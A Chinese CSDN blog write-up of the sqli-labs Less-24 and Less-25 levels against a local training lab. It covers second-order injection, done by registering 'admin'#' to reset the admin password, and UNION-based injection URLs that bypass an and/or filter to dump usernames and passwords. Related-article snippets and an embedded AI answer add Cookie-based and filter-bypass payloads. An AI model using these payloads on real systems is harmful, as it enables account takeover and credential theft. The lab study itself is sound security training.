二次注入(less-24,25)

最新推荐文章于 2025-03-02 21:39:17 发布
最新推荐文章于 2025-03-02 21:39:17 发布
阅读量630 收藏 10
点赞数 5
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2201_75432117/article/details/141112642
版权

Less-24:

首先我们进入靶场

1.使用用户名:admin 密码:admin0(每个人密码都不一样请注意!!) 进行登录

​编辑

2.在登录成功,会出现一个重置密码界面

​编辑

3.我们先不改密码,先回到登陆页面进行新用户admin'#的创建

4.使用新注册的用户进行登录,修改密码为abcd

5.再使用admin用户登录,结果发现登录失败,之后我们把密码换成abcd,再登录显示成功

6.查看源码

Less-25:

我们转换到25号靶场

1.首先我们要判断注入类型

2.继续判断的时候发现过滤了and

3.判断字段数并查看显示位置

4.查看当前数据库

5.爆表

6.爆列

7.爆数据

Less-24:

首先我们进入靶场

1.使用用户名:admin 密码:admin0(每个人密码都不一样请注意!!) 进行登录

2.在登录成功,会出现一个重置密码界面

3.我们先不改密码,先回到登陆页面进行新用户admin'#的创建

密码自定,我是111。

4.使用新注册的用户进行登录,修改密码为abcd

此为密码修改成功

5.再使用admin用户登录,结果发现登录失败,之后我们把密码换成abcd,再登录显示成功

登录失败

登录成功

6.查看源码

在我们修改用户admin'#的密码时,实际执行的语句为下列语句,所以我们才能修改用户admin的密码

UPDATE users SET PASSWORD='abcd' where username='admin'

结束

Less-25:

我们转换到25号靶场

1.首先我们要判断注入类型

通过报错,我们可以大概看出是一个单引号字符型注入

2.继续判断的时候发现过滤了and

3.判断字段数并查看显示位置

http://127.0.0.1/sqllab/Less-25/?id=1' order by 3--+

http://127.0.0.1/sqllab/Less-25/?id=1' oorrder by 3--+ #双写绕过

http://127.0.0.1/sqllab/less-25/?id=-1' union select 1,2,3 --+

4.查看当前数据库

http://127.0.0.1/sqllab/less-25/?id=-1' union select 1,2,database()--+

5.爆表

http://127.0.0.1/sqllab/less-25/?id=-1' union select 1,2,group_concat(table_name) from infoandrmation_schema.tables where table_schema='security'--+

6.爆列

http://127.0.0.1/sqllab/less-25/?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+

7.爆数据

http://127.0.0.1/sqllab/less-25/?id=-1' and union select 1,group_concat(username),group_concat(passwoorrd) from users--+

无奈^
关注
sqli-lab-less24
Sa1nZen的博客
08-14 168
sqli-lab-less24
SQL二次注入
2301_78549931的博客
08-05 870
当用户提交的恶意数据被存入数据库后,因为被过滤函数过滤掉了,所以无法生效,但应用程序在从数据库中拿出该用户名时没有对'和#进行转义,导致将密码的检测注释了,虽然看似后端代码将我们输入的'进行了转义,但是当,这样就实现了,也叫做存储型SQL注入
SQLi-LABS Less-24
m0_64898960的博客
04-26 174
Less-24题目 看到有登录页面,有注册,还有找回密码…之前好像做过类似的题目,好像是二次注入的类型… 就是判断你能不能改掉admin的密码 这里借助phpmyadmin使我们注入过程更加清楚 这里我们admin的密码是1,我们的目标是改掉他的密码换成我们的改过的密码。 注册一个==admin’#==的账户 然后用这个账户登录,并更改密码,便完成了注入… 总结 为什么使用的是==admin’#==来作账户 在更改密码的时候会出现UPDATE users SETpasswd=“New_Pass” W
Less-24(二阶注入
2301_78554096的博客
03-02 286
Less-24(二阶注入
Less 24二次注入
老司机开代码的博客
08-04 1102
文章目录前言1. 二次注入的原理1.1 个人理解1.2 Example2. 题目分析2.1 主页2.2 注册页面2.3 登录成功界面(修改密码)3. 注入过程首先看一下数据库中原本的用户信息: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200711191827350.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubm
SQL注入二次注入
HaHiLi的博客
07-25 949
二次注入的原理,在第一次进行数据库插入数据的时候,仅仅只是使用了addslashes, 或者是借助 get magic_quotes_gpc 对其中的特殊字符进行了转义,但是 addslashes,有一个特点就是虽然参数在过滤后会添加“\”进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。比如在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;在测试中,应先确定网站是否有过滤(一般都有)然后寻找注入点,一般邮箱,注册,修改密码,文章添加,编辑出现概率大。
sqli-labs Less-24(sqli-labs闯关指南 24)—二次注入
m0_54899775的博客
12-24 1124
sqli-labs Less-24(sqli-labs闯关指南 24)—二次注入
【SQL注入-08】二次注入案例—以sqli-labs-less24为例
m0_64378913的博客
05-06 1536
1 二次注入概述 1.1 定义 定义:在将数据(一次注入的)存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。 例子:在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。 1.2 思路 (1)黑客通过构造数据的形式,在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理,提交的数据报文请求中可能包含了黑客构造的SQL语句或
sqli-labs靶场实现(十)【二次注入(二阶注入)】(less-24、具体步骤+图文详解)
weixin_46709219的博客
01-05 1383
一)二次注入 1)二次注入介绍 2)二次注入代码分析 3)二次注入利用 4)二次注入危害 ———————————————————————————————————————————————————— 一)二次注入 1)二次注入介绍: 网站服务器和数据库服务器的交互是一个双向的过程,用户通过浏览器访问网站服务器进行用户注册,注册之后就可以登录网站。此时注册时的信息会进行“注册信息存储”(如:账号、密码),那么也就会存储到数据库服务器中就有了第一个输入。之后我们进行信息修改时也会进行数据库的交互,那么就会将第
SQL注入——sqli-labs(Less-1)
E-Malon的博客
05-29 423
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
报错注入学习及利用报错注入Less-5
willow_liang的博客
10-29 752
二次查询注入 #需要用到的sql函数学习 (1)count():返回某列的行数 count(*):返回某列的所有行数 (2)rand():随机输出一个小于1的正数 (3)floor():输出的结果取整 (4)group by语句:结果分组 (5)concat():连接两条语句 二次查询实质就是在select语句中嵌套一个select语句,其中嵌套的语句称为子查询。 (1)select concat((select database())); (2)select concat((select data
Sqlilabs解题思路Less-24
Mr.Huang_的博客
10-22 353
目录Less-24 - Second Oder Injections *Real treat* - Stored Injections(二次注入) Less-24 - Second Oder Injections Real treat - Stored Injections(二次注入) 我们的步骤是 1.注册一个admin'#的账号。 2.login.php中是一个检查用户名是否成功登陆的页面,但是其中的sql语句有点问题: $sql = "SELECT * FROM users WHERE userna
Sqli-labs之Less-24二次注入
m0_46315342的博客
06-04 605
                                          &nbs...
less-24】基于SQLI的二次注入
未名编程
07-19 379
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 实验目的实验环境实验原理二次排序注入思路:实验步骤第一步 在kali平台上使用Firefox访问SQLI的less-24实验第二步 注册一个新账号第三步 以账号admin'#密码123456登录后修改密码第四步 以账号admin密码test登录成功思考与总结 实验目的 通过本实验理解SQL注入二次注入漏洞引起的原因,如何利用漏洞进行二次注入。 实验环境 渗透平台:Kali 目标网站:SQLI平台 实验原理 二次排序注.
SQL注入 Less24(二次注入)
开心星人的博客
07-26 930
第一次进行数据库插入数据的时候,使用了addslashes、get_magic_quotes_gpc、mysql_escape_string、mysql_real_escape_string等函数对其中的特殊字符进行了转义,在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入),而网站程序默认数据库中的数据都是安全的,当网站程序第二次调用刚才存储的脏数据的时候,则不会转义使用而是直接使用,因此就会达到注入的效果。,存入数据库的数据仍为。...
web,sql注入二次,加解密,dns注入等(17)
san3144393495的博客
04-26 419
这个二次注入,和前面讲到那些注入有一些小的区别,而是产生的地方区别,从查询方式我们可以根据网站的应用功能判断他是何种查询方式,还有其他的,但是他们但是在注入的原则什么进行一些编译,比如说提交方式,查询方式,参数类型等一些的不同,但这个二次注入,有不同是无法通过扫描工具或代码自己手工去测试出来的,只能从网站源代码里面才能发现二次注入漏洞,从前端或黑盒测试是看不到这种漏洞的,有也找不到,这也是它的特点,传出来是什么东西啊,肯定有问题。常规注入的话,加解密就是多了一层按照他的加密方式去提交。这是注入扩展里面的,
SQL注入之宽字节注入、堆叠注入二次注入
m0_61506558的博客
09-17 1321
渗透的学习,必须要心无旁骛,通过靶场实战不断总结经验,vulnhub、hackthebox......这些靶场,如果有一个知识点没有掌握就会卡着动不了,之前整理sql注入的文章有点杂,主要原因是此部分内容较多。(一)宽字节注入如今有很多人在编码的时候,大多数人对程序的编码都使用unicode编码,网站都使用utf-8来一个统一国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。
Sqli-labs 高级注入(Less23~38)
angry_program的博客
02-02 1287
目录 前言 Less-23 过滤注释的显错注入 Less-24 二次注入 Less-25 过滤and和or的显错注入 Less-26 过滤空格和注释符的显错注入 一、空格绕过注入 二、extracvalue函数的显错注入 三、布尔盲注 Less-26a 过滤空格、注释符的布尔盲注 Less-27 过滤联合查询关键字的显错注入 Less-27a 过滤联合查询关键字...
sqlilabs less21-25手工注入
最新发布
03-22
<think>好的,我现在要解决用户关于SQLILabs Less-21到Less-25的手工SQL注入问题。首先,我需要回忆一下这些关卡的设置和可能的注入点。用户可能需要详细的步骤和原理,所以得确保自己理解每个关卡的特点。 首先,Less-21到Less-25通常属于高级注入技术,可能涉及更复杂的过滤和编码处理。比如,我记得Less-21可能涉及Cookie注入或者某种编码,比如base64,而Less-23可能过滤了注释符,需要绕过。Less-24二次注入的示例,Less-25可能涉及OR和AND的过滤,比如使用双写绕过。 接下来,我需要查阅已有的引用内容。例如,用户提供的引用[3]提到使用union select并闭合引号,引用[4]使用了报错注入和布尔盲注,引用[5]涉及联合注入和报错注入。这些都可能在不同关卡中用到。 对于每个关卡,我需要分步骤考虑: 1. 确定注入点类型:是GET、POST还是Cookie?是否有特殊编码? 2. 判断闭合方式:单引号、双引号,是否带有括号? 3. 绕过过滤机制:是否有关键字过滤(如union、select),如何绕过(如大小写、双写、注释符)? 4. 选择合适的注入方法:联合注入、报错注入、布尔盲注还是时间盲注? 5. 构造payload并验证:确保闭合正确,语法正确,能够提取数据。 例如,Less-21可能是Cookie注入,且数据经过base64编码,所以注入时需要将payload进行编码。而Less-23可能过滤了注释符,因此需要手动闭合后面的引号。 需要注意的常见错误包括闭合不正确、未处理编码、忽略过滤规则等。因此,每一步都需要验证响应,确认注入是否成功,比如通过错误信息、页面内容变化或时间延迟。 此外,用户可能需要具体的payload示例和解释,所以需要给出每个关卡的典型解法,并解释原理。例如,在Less-25中,如果过滤了OR和AND,可以使用双写绕过,如OORR。 最后,生成相关问题时要覆盖每个关卡的关键点,以及可能的变种情况,帮助用户深入理解。</think>### SQLILabs Less-21至Less-25手工注入解析 #### 一、Less-21:Cookie注入+Base64编码 1. **注入点定位**:通过Cookie参数`uname`传递,数据经过Base64编码[^3]。 2. **闭合方式**:单引号闭合,需构造如:`' union select 1,2,database() #` → Base64编码后提交。 3. **Payload示例**: ```sql admin') union select 1,version(),3 --+ ``` 编码为:`YWRtaW4nKSB1bmlvbiBzZWxlY3QgMSx2ZXJzaW9uKCksMyAtLSs=` 4. **利用步骤**: - 使用浏览器开发者工具修改Cookie中的`uname`参数 - 通过报错信息或联合查询提取数据 #### 二、Less-22:双引号闭合+Base64编码 1. **区别点**:闭合符号为双引号,Payload需调整为: ```sql admin" union select 1,@@version,3 --+ ``` 2. **编码注意**:需对完整Payload进行Base64编码后提交。 #### 三、Less-23:注释符过滤绕过 1. **过滤规则**:过滤`--`和`#`,需手动闭合后续引号[^4]。 2. **Payload构造**: ```sql ?id=1' union select 1,(select group_concat(table_name) from information_schema.tables),'3 ``` 利用末尾的`'3`闭合原SQL语句中的第三个字段。 #### 四、Less-24二次注入 1. **场景特点**:通过注册用户名注入,利用密码修改功能触发。 2. **攻击步骤**: - 注册用户名为`admin'#` - 登录后修改密码时,实际执行: ```sql UPDATE users SET password='new_pass' WHERE username='admin'#' ``` 导致修改admin用户的密码。 #### 五、Less-25:OR/AND过滤绕过 1. **过滤规则**:过滤`OR`和`AND`,使用双写绕过(如`OORR`)。 2. **Payload示例**: ```sql ?id=1' OORRder by 3--+ ``` 或使用`&&`替代: ```sql ?id=1' && substr(database(),1,1)='s'--+ ``` --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值